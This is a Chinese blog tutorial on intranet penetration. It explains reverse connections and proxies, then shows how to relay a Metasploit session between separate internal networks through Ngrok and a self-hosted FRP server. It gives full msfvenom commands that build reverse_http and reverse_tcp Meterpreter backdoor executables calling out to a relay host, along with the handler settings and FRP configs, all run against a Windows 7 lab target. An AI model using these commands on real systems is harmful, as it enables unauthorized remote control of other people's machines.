内网安全 - 内网漫游 Socks 代理(ngrok&frp)

最新推荐文章于 2024-05-17 14:56:59 发布
最新推荐文章于 2024-05-17 14:56:59 发布
阅读量1.1k 收藏 2
点赞数 1
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/acepanhuan/article/details/129636967
版权

内网漫游 Socks 代理

基础知识

内外网简单知识:
	内网ip地址是私有ip地址(10/8, 172.16/12 , 192.168/16),除此之外就是外网ip	
	两个不同的内网的主机想要通过CS或者MSF等工具实现控制或者通讯是不可能的,必须要借助代理

正反向协议通信问题:
	正向:控制端连接被控制端;
	反向:被控制端连接控制端

	什么要区分正向和反向?
	因为如果控制端是外网主机,被控端是内网主机,就相当于控制端有一个唯一的IP地址(比如103.12.4.11),
通过这个IP地址就可以找到控制端而在内网的被控端(比如192.168.23.36),你通过控制端主动去找是找不到的,
因为这个内网IP地址并不是唯一的,可能很多内网都用了这个IP地址,你根本没法找。此时就需要反向连接了,让内网的被控端主动去找外网的控制端。

内网穿透中隧道和代理的区别:
	代理:主要解决网络的连通性问题(如果内网中存在防火墙等等禁止对代理的相关协议,代理就不能用需要隧道进行协议的伪装)
	隧道:解决流量分析工具、流量监控工具、防火墙等相关工具的过滤问题(代理的高级版本,进行了协议的伪装)

代理解决的问题:
	内网有外网,内网有过滤(防火墙),内网无外网(单纯主机服务器,无网络)

代理相关工具:nps、frp、ngrok、reGeorg、sockscap65、earthworm、proxifier、proxychains

内网穿透 Ngrok 测试演示-两个内网通讯上线

两个不同的内网(都有网络但是两者无法通信)实现穿透控制
在这里插入图片描述
Ngrok
国外:https://ngrok.com
国内:https://www.ngrok.cc/
1.注册登录,下载相应的客户端工具
在这里插入图片描述
在这里插入图片描述
2.开通隧道
这里有HTTP/ HTTPS/TCP三种隧道供我们选择,常用的是TCP,这里演示HTTP的
在这里插入图片描述
在这里插入图片描述
3.配置本地端口(虚拟机kali的)
在这里插入图片描述

4.kali上启动Ngrok
协议:http 本地端口(kali):192.168.76.132:4444
测试:内网win7 执行后门—ngrok主机处理—内网 kali 监听—内网 kali 接收

将Ngrok客户端传到 kali上,启动

./sunny clientid 隧道号

在这里插入图片描述
在这里插入图片描述
Tunnel Starus online 表示隧道畅通,如果显示其他则表示不同
Forwarding http://xiaodiisec.free.idcfengye.com 接受到数据会转交给 192.168.76.132:4444

5.利用msf生成后门并监听
注意这里的协议,隧道选择的是HTTP协议,那么我们生成的后门也需要选择HTTP协议,不然不通。
这里生成后门的对象是ngrok的服务器(域名+端口)

msfvenom -p windows/meterpreter/reverse_http lhost=xiaodiisec.free.idcfengye.com lport=80 -f exe -o test.exe

MSF生成HTTP后门
![在这里插入图片描述](https://img-blog.csdnimg.cn/3a3816da96db4388ab8f58be8b76f9eb.png

在这里插入图片描述
在这里插入图片描述
MSF配置监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 92.168.76.132
set lport 4444
exploit

在这里插入图片描述

6.将后门上传之win7上去运行
在这里插入图片描述
在这里插入图片描述
总结:就是通过外网服务器ngrok做个桥梁,让不同内网的主机建立连接,使其能相互访问。
ngrok缺点:速度慢很卡(需要氪金),连接容易容易断,别人的服务器(不隐私)

内网穿透 Frp 自建跳板测试-两个内网通讯上线

Ngrok工具使用的是别人的服务器,容易泄露隐私数据。
Frp工具(最主流的工具):开源免费,自行搭建,方便修改,成本低,使用多样化,防止隐私泄露。
Frp下载地址
Frp参考文档

1.配置服务端(需要自购服务器)

下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)
根据服务器版本选择对应版本下载
解压:
tar -zxvf frp_0.44.O_linux_arm64.tar.gz

服务器修改配置文件 frps.ini:
[common]
bind_port = 6677
启动服务端:
./frps -c ./frps.ini

服务器修改配置文件 frps.ini
在这里插入图片描述
启动服务端:
./frps -c ./frps.ini
在这里插入图片描述

2.配置控制端

控制端修改配置文件 frpc.ini:
[common]
server_addr = 你的云主机 ip
server_port = 6677 #frpc 工作端口,必须服务端 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #转发给本机的 5555
remote_port = 6000 #服务端用 6000 端口转发给本机

启动客户端:
./frpc -c ./frpc.ini

控制端修改配置文件 frpc.ini
在这里插入图片描述
启动客户端:
在这里插入图片描述
客户端启动后,可以看到服务端已经有显示数据连接了,这种情况表示服务端与客户端连接成功,如果启动了客户端没有出现链接成功的话说明存在配置存在问题,需重新配置。
在这里插入图片描述
3.MSF生成后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=你的云主机ip lport=6000 -f exe -o frp.exe



use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit

在这里插入图片描述

4.后面放到win7靶机运行 frp.exe 即可
运行后可以看到MSF已经接收到了反弹的回话
在这里插入图片描述

acepanhuan
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
又探内网穿透——穿透工具ngrok,frp
蜜汁程序员的博客
08-01 2万+
搜索内网穿透,蹦出来一大堆的内网穿透工具,这不禁让我怀疑人生:已经有这么成熟的产品了,还研究内网穿透干啥? 事实证明,这些内网穿透的工具,从原理上看,一是用的开源代码FRP、NGROK包装的,然后就是走的公网服务器中转。 并不是我想要的TCP-P2P穿透通信。1 而且调研过程中发现一个非常令人失望的事情,如图: 可惜成功率不高 只不过是中转,有什么意义呢? 可见,目前比较成熟的内网...
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
内网安全是信息技术领域中的一个重要话题,特别是在企业网络环境中,域横向内网漫游Socks代理隧道技术是一种解决内网间通信难题的有效方法。本文将详细介绍相关知识点,并通过实际案例来展示如何应用这些技术。 ...
msf生成木马-----使用不良手段法律后果自行承担
qq_42430287的博客
12-21 863
msf生成木马,该文章博主用作实验,使用不良手段法律后果自行承担
【网络安全】 MSF生成木马教程(1),通宵都要看完这个网络安全关键技术点
m0_61331407的博客
04-09 419
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
frp内网穿透使用教程,点对点代理,socket5代理
最新发布
爱喝星冰乐的博客
05-17 477
内网穿透
【网络安全】 MSF生成木马教程
一直被模仿,从未被超越
03-13 1212
1、当客户端点击木马后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成木马。本例用的是 Themida。二、Kali 开启监听。2、设置Payload。
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 4466
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
内网渗透—隧道搭建&NgrokFrp内网穿透
剁椒鱼头没剁椒的博客
06-14 4222
内网渗透过程中会遇到很多的内网主机不能访问外网主机,或者做了很多的限制。导致我们的后门木马无法上线,而这时候就需要根据具体的显示是使用DNS隧道还是ICMP隧道以及其它的隧道技术,或者是使用内网穿透,使其内网主机穿透防火墙的限制,访问外网。简单来说隧道技术就是解决通信上的问题,例如防火墙的限制,或者某个协议或端口被限制,这类隧道技术主要就是借用不同的协议以及不同的端口来绕过防火墙的限制,以实现内网主机与外网主机的连接。
frp实现socks5代理
热门推荐
qq_29566629的博客
03-01 1万+
frp工作原理 服务端运行,监听一个主端口,等待客户端的连接; 客户端连接到服务端的主端口,同时告诉服务端要监听的端口和转发类型; 服务端fork新的进程监听客户端指定的端口; 服务端连接到客户端指定的端口,服务端通过和客户端的连接将数据转发到客户端; 实现流程 把客户端frpc和frpc.ini上传到需要建立通道的主机: frpc.ini的具体内容为: 在攻击机安装frps和frps.ini。 frps.ini的内容如下: 先在攻击机,也就是服务端启动frp服务,开始监听7000端口
FRP内网代理
weixin_51151498的博客
07-23 1864
FRP内网代理
frp内网穿透(socks隧道)
2301_76227305的博客
03-06 2713
在实验过程中还是遇到了挺多的问题,但好在大多都解决了。不过还是遗留了一些不懂的问题,等以后再慢慢研究了。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
内网渗透之端口转发-内网代理1
08-03
①正向代理 (Forward Proxy) ②反向代理(reverse proxy) ③区分 ①内网机器上执行:lcx.exe –slave 公网 IP + 端
socks5-configurator:使用socks5代理配置Chrome
05-17
Socks5配置器 使用socks5代理配置Chrome 安装 作者 一个项目 执照 根据MIT许可获得许可
jersey-client-socks-sample:通过 SOCKS 代理使用 jersey-client 的示例
07-04
通过 SOCKS 代理使用 jersey-client 的示例 球衣版本:2.14 创建自定义HttpUrlConnectorProvider.ConnectionFactory以应用您的袜子设置 将 ConnectionFactory 注册到 jersey HttpUrlConnectorProvider 直接操作...
EarthWorm 内网穿透神器
01-18
EarthWorm是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。相较于其他穿透工具,如reGeorg等, EarthWorm可以穿透更复杂的内网环境同时也不需要跳板机运行web...
内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok
m0_65336233的博客
12-23 2279
内网安全-隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok
内网安全Socks 代理 || 本地代理 技术.
网络安全领域___专研者.
06-12 5826
Socks 代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.
frp通过socks5二层代理,访问内网三层网站
千寻的博客
10-07 4620
假设:已经获取边界服务器()的服务器权限,win7服务器()的权限配置一层代理,访问192.168.52.0/24网段,以便访问第二层网络()配置二层代理,访问192.168.93.0/24网段,以便访问第三层网络()现在 ubuntu(web1)要充当frp客户端和frp服务端,以便访问第三层网络。
常见的内网穿透工具有 ngrok/ localtunnel/ frp
09-18 815
内网穿透工具的工作原理是通过在本地网络和公共网络之间建立一个通道,将公网流量转发到本地网络中的服务。
frp socks5代理 内网渗透
10-18
frp是一款高性能的反向代理工具,可以将内网服务映射到公网上,从而实现内网穿透。而socks5代理是一种网络协议,可以实现TCP、UDP等协议的代理转发。结合使用frpsocks5代理,可以实现内网渗透的目的。 具体实现方法如下: 1. 在公网服务器上安装frp,并配置好反向代理规则。 2.*** 在攻击机上使用socks5代理客户端连接内网机器的socks5代理服务,即可访问内网服务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值